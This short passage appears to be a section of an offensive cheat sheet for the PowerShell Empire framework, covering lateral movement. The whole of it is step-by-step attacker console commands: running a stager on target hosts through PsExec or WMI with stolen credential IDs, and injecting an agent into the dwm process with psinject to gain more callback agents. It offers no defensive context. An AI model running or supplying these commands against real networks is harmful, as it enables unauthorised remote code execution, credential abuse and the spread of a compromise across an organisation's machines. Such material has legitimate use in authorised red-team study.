3. LATERAL MOVEMENT
Execute a stager on remote hosts using PsExec
(empire: agentname) > creds
(empire: agentname) > usemodule lateral_movement/invoke_psexec
(empire: agentname) > info
(empire: agentname) > set Listener [listenername]
(empire: agentname) > set ComputerName [ipoftgt] (Ip address of target)
(empire: agentname) > execute
[if successful will create another agent ]
Execute a stager on remote hosts using WMI
(empire: agentname) > creds
(empire: agentname) > usemodule lateral_movement/invoke_wmi
(empire: agentname) > info
(empire: agentname) > set CredID [number] (CredID from Creds )
(empire: agentname) > set Listener [listenername]
(empire: agentname) > set ComputerName [ipoftgt] (Ip address of target)
(empire: agentname) > execute
[if successful will create another agent ]
Injecting into the DWM process
(empire: agentname) > ps dwm
--------------------------------------------------------------------------------------------------------------------------------------
ProcessName PID Arch Username Mem Using
dwm 612 x86 xxxx xxx
--------------------------------------------------------------------------------------------------------------------------------------
(empire: agentname) > psinject listenername [PID]
(empire: agentname) > execute
[if successful will create another agent ]
(empire: agentname) > back
(empire: agents) > list
(empire: agents) > interact [nameofagent]